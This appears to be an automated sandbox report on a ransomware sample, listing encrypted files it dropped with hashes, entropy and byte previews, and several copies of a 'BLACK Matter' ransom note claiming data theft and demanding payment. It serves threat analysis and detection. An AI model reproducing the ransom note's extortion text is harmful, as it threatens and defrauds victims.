              Preview: [....V...gO.0..g.Mm.........x..<...&.+.@.C-X..k..,.6..U...!.y.q....W.#_.].F.O.....\.,..mu.1...'PcH.././...}.z.{..`.V.:...I......F.....t?..V.].O.L......q(......}..a.jC&..).y!s.Q.{..Hg/>..$.t}...........krP...d >....(.}.ld6..)6%.BFu..^,-e{....a.yY7..CK..9...f..o..,iG..!...Y.\..~)..~..X..r.............;6.......=2x..ul;.#..9l..zQ...../....~^Y.*C.?.K.K......b..^...dYYP............q.t/...q..\..U.9....)l.h.x,.j.<.....d/s.y..t.0....7($.....B..?...V.......h7...\.0.x.<.v%a..p.M.?.WHs=..W....X..Q..Q...x.'.B.O...'8.v..!..:.....,h...[O..*.{[Ru.8...4.....Oe:}.......V."....T...{...t*+(|..6.&.{j.e.z'.~...PXR.M.v.d7.e\.~H...._.P....=.g)...VA.O.P.7..r..[.59g..m$.3...`uh..N....Q....d=...O5.g.7fw 7}..O.f..r.{:..&..3.V..T.N.....Z.6%J...j...+......+..c.s'...ofj8.*...f.;?..cG.v[I........d0.t<,.....G&.Fpi.ZF..1.}...5%....a+..T.5u....VUc.`Q..V..F.~W.....=Gn..&v]b..W...vQa...f..v=...l0.C2.Xb.tY..1...XNf..1.......f1.c;......WF.~...:.#..z=.b.p.F..S<w....]?=..aB.a..
              C:\Users\user\Documents\GAOBCVIQIJ.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.84703967959642
              Encrypted:false
              SSDEEP:24:VhBjgRzSWXyifAE6lbP+pQx+SJn1tr76WLHkSio6ECX0/9Q3H0y:jBjgROWCi4FlyAPnHLLHCj/saEy
              MD5:22A7764AD3F0FE8E4A4E8AA4BB17A899
              SHA1:957703F54806747172F4676485EF7720E28A6778
              SHA-256:3A80A816CCEC31323070D8FADD6DFD13740127429F9A71277B35CD3842049122
              SHA-512:B3CA76BE192A212E92EA4A51CAFC5E6F53943A69D477EF9AAEA1D6E94B22D9BC984756C1088AC627BB9A3BE66390A1FF0C459EDD891C7E147583EA8BBAEEE93A
              Malicious:false
              Preview: h...~...x -T.$....{}(..v....._.WuW.. ..S..^=..C.$.3..g.%...r...}.]^.f+....={&{....tis.?..F=...cm#.....c.L.^.R..e.@.l...z. 3...f..A.R.[.?.".}F.i...%Dqb.X....._4..?..CHh.hj,..F.p+....3..%.g..Z;.......8. ..`..w...}..9&>....`.h..v.s........#..GN.xiJ..,{..>.Y.....Pc...w.E]>......'..HdOG.<.^.7.D4g..t..9..F.%.3.'6+\.....U..?...............i.............i...[3;..\h....b.m.8jSM..'*.U.Hj{...xL.Gkc$.1r7....Np...q.|.vG.P.l.+.g.9...Sl..;....N..k......wBYrl6....2.!!..lB.9/.fg....W....q,2.,V.[..p.]F.v]..%.v.9.M.....z/.....8l..u./.J{.3..;..KnOF-...y....:...|64....ho..V...?.=.$.3.h..e.850...o.g..~..-..\..Z.^4|t....W.N.S..AIbB.M.g..C0....-.(.........r^1.@.u).xq...+.T.x..{.=...m[.|.=.n.f..?>.v....%y......}.. .,..f)j.?y..P..2.<..........-.<...#N.....F.1.K..@lg....SV.y.$.t4.^w....".:6.)...N......%T.U.I.w$..;*(...,......\....1..FS.sB..5E.a.R.B.a.87S.^...f/:`.C.io....r.9%Sn.!....E.....+P|.......N:...AO.....j.b...2GE>.R^:.......aS.......^g"..j.]...U..nm..<...
              C:\Users\user\Documents\GAOBCVIQIJ\BNAGMGSPLO.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.846036150154131
              Encrypted:false
              SSDEEP:24:eyyxP24vEUBO8fPcWI7hRzPn4vHKAdQH+96bDx5kcpC:expO6cVz4vHikWd59C
              MD5:FC4DCBB16065451D815C3D9EC175CC22
              SHA1:E5C5139AF25C556DF9ED3D22D83B746A8295B4D1
              SHA-256:7BF8877C9BAFA760BAB9FCA9874796D46631D9CDB674BAC2286B85253A967DC4
              SHA-512:E65C9B85B95DCB621DEE4DB7F6C18C30509FE83E3CC3B749392A691C0C28F6EC21127BBBF739F6E7EE1FC61D7453A5601CB40A5F6AA4A37B55AB7CE625AF2F4E
              Malicious:false
              Preview: .cl.=P5.CK4!..V...-..sO9...X......+?....!H.v..{..c.u'...4...Y1d......JX.:.$...4*..I..BB.|.m...Fa....Ut.,V.......'.............WB/.B...O....}...?.5.B.&....p..Qi.@.<.3n..S....?...2.`:..u!.$.B.m..}...@.e..6..%v&.Igf'.b$.........31y)'.6..C1....M.......!?..C..p\..+.R... ."?.\..O........h-.........g...z'q.....-0R.t'...{..<4...hn.....{........3|..._m.&.VW....B..qq....Q.YT.au..)6?..#*Gl...|.Y..N...W.Ae&.9...y(J...s.1...h.4.<..[.Iz.8.N... .>bE..J....0j........N.K.c[..z...f_w'h.Le....d....T..M....L.uMs..a.......]Z(~..q..&.^.9.+1.>..e...0l....#..&!).w...|o.N...3.k'3.;.H.,....P.V....1.^.].#*f...G.......,..."_..U7........Os>.A..I.[E.v...Kh...w.zF.T..."..=b.#\/..F.'p..n6...6....Tb..8p."..Wv\!..c..Q...w.Z.k.3..)g._..J...#.mT....I(..2.5...ot...9o....)...t@9... ....z_)...[.1..D.q(..w^..........k.>.c_D-.... ..w6...m.?.%.Kt...$..8.f.l_.;...PHx....u...~.9.R......"...R.z=UgVl....@..9.z$f....,.C1j....v..m..Pt*.2./........8..L}.6.2 ......y...0.[.t.]Bw.8......;.
              C:\Users\user\Documents\GAOBCVIQIJ\EEGWXUHVUG.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8390763542638435
              Encrypted:false
              SSDEEP:24:74+DA4PG+RYJw0gpn4w7RxTDM1vh6zZIbbH+Fw0Nw/JUBEmTGHdi4NpE6J:7RAVYBGvc5w0GGuHgj6
              MD5:08152FC4ABA42F96ED24CFDE88CA44C8
              SHA1:5449DAC72DCF8D27F43CC3C5FB7695DF3325CA49
              SHA-256:87B73319FA58F1D9626502E187C1A4D2C2686EED7890632420AA61EC91258CAA
              SHA-512:A29E1108FE8A828FA6F67B1C26C9F696C470A6D0B247FA073B0A1FDFA9D27A79EAF83D39BADF610263B7D0A7F664F08B8E3EA8EE666BD1F847AFD011E8CC9556
              Malicious:false
              Preview: ......QZ.3.T...Z!....W3`Nn..)l..{e..VH~5.B...ZQ...[.5|Z....C.... k.......Pf..a.....}._/..?..L....t....X..'s!.:..cV.k.9.c.9....*X-.....SsG.D....c.D]m..;.=i....F"...![.2J...x.a........At...j.JGx...F\.^b..S$.*.)...F.=E;.X|..[e....bG..Xbn.s$.uE.K.0@%....b]<..W.Z^...K....D........1.....@..o2..%...Jz-G.]..F..l....:.PHc.........+.n.<..^_.r3..~.........k.......a........,..J.T..c#66;..KF..5z.....c..g....E..Q....Z.0.h...$@.@%q.i.3\.g..7xh|.*.E.=.9.~+?.......Q...r....t..D.75...".u....X.X........W.uO. .\!s(H.i.!.h..:....9...2..z~.'.48.@Z^\.........E...{.vV..-/Q.L.............X.*F.D...F..(~.[.`.Y@.X....#..4uQ....'.%$K..,.-..E..m.....N.......V........x.l..>...u.Pp.h...^....-Ea..v...`..,~....N....j3i<....B......Y^.Y.....{'t..v.~'...u.Y.9M4..T.5..K.o...(T.....}.Ok.G...8.%Z.Ha...<E.g..>m.....R......m.........X..F....CLT.}...d..f..yg..S......$&....Y.!.=.1..../4hW'...u..W...M........s.[z.8Wb....d-..+..%gA.K._ A.....8_.OT.L.T_..[(..z(8.}...X..?...c.#P
              C:\Users\user\Documents\GAOBCVIQIJ\EFOYFBOLXA.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8422490337537205
              Encrypted:false
              SSDEEP:24:4SBe2ruS2fUJRP+aDdgq+15GthtEKnkYtyiLyEGwh6XRFfEWX:4SvY+LBybGthtE+xnLyEGm0vX
              MD5:769F1DB6B0F1C114F26687CC66D9B780
              SHA1:540A3DACD05167E02849168AA94DC932298050E6
              SHA-256:563DB6C72FE25F9F40D2B1CED79B9A64DB0A0A75256E2E90AA0285E6B9103B74
              SHA-512:668AF22719A389484802005BC3AD7CF28E6C4997AF5C155DE9137A58EB7523A14E9312B2F270209A922F85F058FCEE8514B64ED6F1C154C08C26407690988A6C
              Malicious:false
              Preview: ..^.....*...].{...(.......c.@^.. ...N........Fn}..$...x..nQv..&.....L.a..._:Y+Ub..uQT."W..9.=0w.^j..(...pbJ...K3..aK.|...t..)..._T.w.7.v.......A.:...v..L{4J.....P....y..Q.mu%).:g:.vz ......D4...{.....6.)......{>c.._..j]...4.G..U.u.._..1. \*.j~...u.W~r.(>d..QB.:...R:......]......u|..[..?.qs..R~....t..7.......o..............,.V\.`jR{i...7&b.SyRef...w.gbq.....@....+...,.1.[....^..TW.Q........i.....Z.e.L./.&M.n#....l...m't. ..Z.'.4&..m....|.3Td:.0bH.#.....R.-...k...Q.#.?B.....].Sg...........OW.z.?..zN.......w.R..Wz.........Xj F~....tI..N...5/..r}._`i.]<A.T....\*.."...1G........../.z.P........)....p.|.9..x.Eh.QL0..[..R$..q....2k.-.........v:....G.....<..F..~.Z..%....j.?#`2.FL...N.7s..*.......[..Xw.`.r.e..=.i..4^@..2..R.."~Y...d`=.8~.....z.H.]...~E..Ej..I#...@.#{..~x...k...P..W.Z..N.M.m{.@.F..e...#...q...........].d.cs....8q.....@.*.......e..pGOcPAd.....) .Z3..}.2o..23.......\t.Y...G....M.T.<..9.|3..p:P......|.:D..o..!....`.v".p
              C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.850716352611268
              Encrypted:false
              SSDEEP:24:W7sXBairoxq8A6sWLa3qN2XvNmwgAt7xT/ZKFv2/hQDAW7BL:W7GBaiwsWd2XvowgAtFRcu/2Dz7l
              MD5:B3D61F94C3124564A8FED746523552FE
              SHA1:D7CC25EF0AFD5D48ADCC55C1C18377B52B08B528
              SHA-256:5EFABFE58C04AC525D202EC9513B4C74C743339DB90327A890CC4E0476C36C22
              SHA-512:7B45A3EB43C9077656F3FAC59F1E2BA2559007CB8B67B9E32CB7A01C76CF899AE75EE2048A3322C045C7640A8026F318572C885AD6C2A065EA716A0D9E49BBAB
              Malicious:false
              Preview: .I..w{...+..{...VSa....Ps3....,..T...w+..4.`...l..+..$...|J........`k...;.N.t|J-..]...... e+....~.1.a|......?o.(x..<..*..Nt...7..s.j.~.....n.)nf6$..`...?..l64....E..;=.)....u.... ^.#....B..].shq'%{.......D{!.=u&..r...!..8j.9.V..P.%..M.xi.p..a...V.Y=.Hk.J3f....,JWX....v...+"...;.5%..D`LG.B...N#..(..;V.R......1.2...../!.].C-..e..H.Qi.>,F. :+.+c\......?.P.....m.l....Db.E.....2|..?..+..Qk...-4........}..S..d.E........Ky...\....=..+'.3"......5f..g...y.o....H=........j.....`gK......T........./.~~..._qq..rWu3..>a..%..G......s....M..l.......}.6...6.?..xQ.4.......X.....md.9..v.2..-."(..>g.[rZ.L.,......(<...;.n..E7.`#.n.K.j.5...d...>y....K.*&J8s..;l.b.}.........>.fr..K....a....&....I...r.?....0.P#..t.&.6.;.V....\.x.....6.\.....}[+Zn....3.;.....b.m..}T)..|fK..q......$..<..........A......o._........<..1.h...L...,.....u.E&.K\.a.R.....f."U..ht.....f.........l.@9..G.-...L..=.jhg..6...`..)..*.nMe....i...-...).:oP....A..|W........P..V.g9.d...N=:.\.D.
              C:\Users\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.833260017347507
              Encrypted:false
              SSDEEP:24:b3Mue9OxhOE9Hds5lxZfjSeVBpyvrg7haEZ2nrEeS2nFUlWwrbYb:b8ue9OfOEtdUxZfjSeVB+sMEZQEraFA4
              MD5:718DA9B5A09ECE821176501B657212B0
              SHA1:B32932854E77E650DE15432303C74C7E56CEF342
              SHA-256:3E105F92E44859661E20626B0EDF034574AC21ACFC5DCC6DFEFD98D80B9BE33A
              SHA-512:1D427D3B7C7E010A00FDD2C5E71AF88C3C04D9C370953BA46AC9F8A8F6589C015E0075C9EAB8545F5F72982066F68F27E94297C1A9F3B4F0F47E0BC98BC26E12
              Malicious:false
              Preview: ..!AZ\..jg&.1P......\q..5.Y%.... .4..v.. |2J..T.<g....?.T...1[.G;-._.?..9xqY..7LX..F...l........h.!..0h.."....x!........Iz.%.......uw......?..U.Z.v...A.T.^.aS2p0a.....Cs.R.-....~..9..^MdJv.O..O.$..c..o.1..k.5.h..i..o.!.L.c8i:...........#....X)......wl..[......Ig..3.\.?vf..s.wT...d..a...>..E...9%.-qNS.._./...I........t.]+92t..C.8...q....J..)G..o.j...T.#.'A'......Im.g)..7..+.....P?....Y./..h=7l..V.AXtx/.....R......b}.>Y.5...^.6S<.....k.yT.Z..MT..h..........^.p.....e..z...$..pQ.;......:..F..+j.:.)v{B..V..b..J....Zh6.9....Sj.F;(..O..0T_.e*.....7/i..F e.D......yU.xn!.p.....5......`...;1._.'{<.....G.m...........*..g.l...Y.....ALm.%,......-..h/.......5.....ot.[...-....vz#-F..H../'..ZY.6)...Rz.o'.B.I.....TQ...m...Y.C.$.eH)..+.G...d..L.[av.TO8..........1.H.\o..O.+..VW.o.........;.8y.0....kQ...3+J.].;.....'.....K}..x6...xE.~..V.c<......T.$,/+m+;L.9!..!o..Q:..H..L/..#E|..q.W.....s5c.|...._@.$....?._.h.?.........h!0...;.{.".n.}e...-.n.B........
              C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.84409052173053
              Encrypted:false
              SSDEEP:24:6+munGwOEBElReqyLuKNE5rUlqi6rfTrGLR8oJSSfT:WQtluKKqwN7H2MSL
              MD5:73570DFF62541E1A8D05EBB9B85D951D
              SHA1:C80A4EC9E00BD6280ABECE92E7136238EBD164B5
              SHA-256:AC42307B59875A784432A6150D6F9448DEB01DE0FEF0A958210A959CD8F6329C
              SHA-512:65DC6B4D127C3826898CD2C0AA900E2809FE7D53641A70FAEDBAC9E1B1DD0C9940EB143A2C708FC7452AA85A9181C96CB3BBB0C921D202F1C6A1882CE42C7B7E
              Malicious:false
              Preview: ....xx..>%..^.7...~!>.4.._<...\v.B....Q <..;.!....W...c.sP..v...8..._.)....;.u%....6J>.S.f4. .&(b.D....j.V.cH...5.X.7.-..8..|..m..~.O..T..Z..c.\\.L...F%.>."xlY.e.*R,.W1.phV........d...Iv..Ma.D.4#........ ..y=/(A..O.iP.WZ.9...a....+#.C..y.....i...'.s..3f..w..dn7.>>..`...,..&3...`...}#.&.fB.}.0..[EL+..0X...c.l%...w.m......J....j..Y.]...Ii.1.T....@.S..v.1.Q....@....^.oJOh......h...?.......\...M.r.k .(.......\BO.T.G7....y."..Q..D..g...r.>.h...i.)...X.*tx?8K.m.`.C.u...i.....^..U_^z....y...J..k.O.D..._yv.a(m<R....Hc.S3-`..w..#CVq...YdR7.k.B6..........F..e..<..B_.SV.R.....wiXGg.7N7:b..F=I..|z.A.\....[p.s95.>kw...U...v*.....b1N.)5....q7"...<#..!.I....~...8o.q.B:Udy...>.L..q.]DD..X.,.N. GOke...K8].]..K'g.}zn....Sg.4f..K..x.p.^R...V.$..LF|..[..Q.e.D.sq...`d|:f:_...F..>QpA.?.5U....x.9yl.wm>..'R.%.'Y... ...e^Z.q.T{b*d............s.Q%.R.t$$+.?bZ..kc.>)>).....E<..w../.I.........*.A......./......x.E..5.$..s.A..C,......".9...z.....'.*4..h...88..k..
              C:\Users\user\Documents\GAOBCVIQIJ\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\GIGIYTFFYT\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:true
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\JDDHMPCDUJ.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.822420938759639
              Encrypted:false
              SSDEEP:24:qSpNixDTbPYjnIv+X9E7B/3WXQsxHFV/RKI+LLISH9CkBZVtoXw:qyYTbPYO+tEtf/sxHFLzyrskzoXw
              MD5:A03FEF92F8E75FA19F06D76807154AE1
              SHA1:C73AA7E45A9B37CF0FA04260286D5815D96F2E8A
              SHA-256:327B28866498B6F43C50A54569BA0A7C564C63BB8681E92E6460AD897DB69156
              SHA-512:59180D915EC500AD6320FF626AAEE6F6610CA716F1A636FBA6C97173DE6FDA4FBEC8345F6C716F76FDAEE79BD763B92D826E2625CE615BF964634B97D3A217A8
              Malicious:false
              Preview: ..Eg....o.H..4r%P.:...U!...>..K.?.b.....:.u/4.C.c>..'e...I.Q`......../..6.....H....b..z.(.U.X........O^:..}k..m.G....=+>h.!...t..1.z(YH...f.*.K&....d..%8.H.7.%.5....="3:..f3....K]54.8!...+?.C.u.....I.....WHG.A<o..Gmw.....ctW........fZ..2K.....$B..=...{.;.+..Jy....Jr./.t...m.q.W....6zS;....U..<.i`.Co........4...]N..J....F.#..|.J..%...?..n..IH*1.....t.D..s.i..p..~..(...".ed..._.4..5..-...EH.w.w...3...iWc....b.....R..v..@..K0.....pCo.M.`....;1O.h..{.e.T.f..^.mP.&...eN.@c...n.v.V.pZ..u..J...%.!>...g.3sY..;.........4..-......r.....|[..p`Xe.7..K.....R.R....v.t.Y...P.....]k..Tq//l...%..|....`H3|.......6jD>...X.s^......W.W....../..'.}.B[.y......i...je;h.[avr#Yv..'..C...a.Y*w@l/...e.R.D..V...P..3..0....9.6z^,.!.Eu..n\...V.G...I,].XrA.^.....N...l...U.r.J1t.K....4.{H..C.TH}...o..bv..d.OC;.|CL{..s.6.s..i.?..E.....T..F.+TFT..R*..aa.E..I....u...fe.m.`...".[...n.|../.....%.v.4..ZX.c.N..../.9.....3e.<3.hf.S.sA}...;b.C.`JY..&..X...a.....Rdmf..._.: .=_n./
              C:\Users\user\Documents\JDDHMPCDUJ\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\LFOPODGVOH\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\NWCXBPIUYI\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\PALRGUCVEH.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.851868158229562
              Encrypted:false
              SSDEEP:24:7Gw8a6MEOirpHvNdO7ay1I9RI06xM39OHS+yoiEi1c9PgwDw5Tiu7vi:7GwL6METhNdx9RiMNOHS+yoO1c9LDwhk
              MD5:93BD24E37F7B224501E8253AE8C25E74
              SHA1:32DE7886811F134E411F9D2F7A2852D52116E68B
              SHA-256:4D157E65130A2BCFD0203AF4A01A6D3D7529022FADE813766392994C12ECB315
              SHA-512:6F44A9E909E7D230A5F343A65CA0D6DFDEB1AADE206CBB82C6565FF7978AAAB84DA48DA00059B2F0648F30F7E35A8A7FF26A3B6A61E8C7B93B9885D729E894FC
              Malicious:false
              Preview: .G.5.z....7|<.P...\.\c-;.k.Q....B.E....1a.b...-.Tt?y.?......\?...r......h)U...K3.....^....H..?.n.&.3......K......er.76...c..D.~u:..;..eVq.... .}5...wv..w..Z).VO....|.....>.#~V~...n.P<....g..0.r9.....K..`V....2...s{.......J.......&j6..>K.....{Hn.. .6...p.e..i?.]qRk]..k.........H.?..5.6`...............\.0....2B...=.fU..%..`|U.<...}..]s.6[..^1......P.|....Z.2.yj....[.Y..DrEN.8.q....f.....F.V....;...b.@....Fo...]................x.;......;4..Z.k....U.#".B..i*...$.. .&s...S...._..+..Y_.wBBL:..$p.;.W.[...r.I.Q..G...M_...w..}...$.....=.Y..>..{..<4...oP;G.........o..i1...)=.C.a....r&......On...._!.|..O..t....d....B,..qg..X..8..T...[..WBz....Nv=.@e...;0+. ...nz..{.q;I....5...I..j...J.._..A..g....dN.....d..D.'.Q.?....z..0~sQ.<rX.O..S...}U...."...(.*.U...~.%.1'..\O....6.....v.BY.&8.P...?...hE...^.p..)d.*..%8M....~.cJO.6 ....o.5N7....{....:..@..4'...p.XY|6...a....,}2...`F$x..].....2A.@...:..S......,.Fc.&.i.M..^8..A*..e...Qo6....R(-G+..d........A.8+.'n(.E.. ..
              C:\Users\user\Documents\PIVFAGEAAV\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:true
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\PWCCAWLGRE.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.834690531778276
              Encrypted:false
              SSDEEP:24:q9ILaiykqxsZNwjdwckHkTusIOIHLnhwCLuJIOsmK/X/zpAWVZhnA1KxNvDwe:VkTjjmJEqs2L+rIOsmSX/zpjVnA1KxNf
              MD5:EB6AEBA015EEDE8B0645E19BF61D977A
              SHA1:4BD6ECA28559C76CB56A48E8361479596658858B
              SHA-256:CFAA035A71414C5440F347DD8BC0490B7CE28BA08FE72DD693AAC8EF1C4D9BF1
